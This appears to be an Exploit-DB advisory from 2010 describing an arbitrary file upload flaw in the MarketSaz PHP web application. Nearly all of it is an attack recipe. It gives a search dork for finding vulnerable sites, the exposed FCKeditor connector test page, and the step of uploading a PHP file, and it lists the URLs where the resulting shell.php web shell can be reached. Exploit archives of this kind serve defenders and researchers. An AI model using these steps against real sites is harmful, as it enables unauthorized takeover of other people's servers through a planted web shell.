MarketSaz - Arbitrary File Upload

EDB-ID:

13927

CVE:

N/A


Author:

NetQurd

Type:

webapps


Platform:

PHP

Date:

2010-06-18


==========================================
MarketSaz remote file Upload Vulnerability
==========================================


#Exploit Title: MarketSaz remote file uploade

#Author: NetQurd (NetQurd@Live.com)

#Dork : English = Powered MarketSaz


#Software Link: http://www.marketsaz.com

#Platform :linux/php

#Exploit : http://target.com

#http://target.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

#Example site: http://server

#Select the "File Upload" To use = php

#http://server/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

#Sh3ll : http://server/admin/view/javascript/fckeditor/editor/filemanager/connectors/php/shell.php

#OR

#http://server/shell.php
# Spical Thanks To Net.Edit0r (Net.Edit0r@att.net)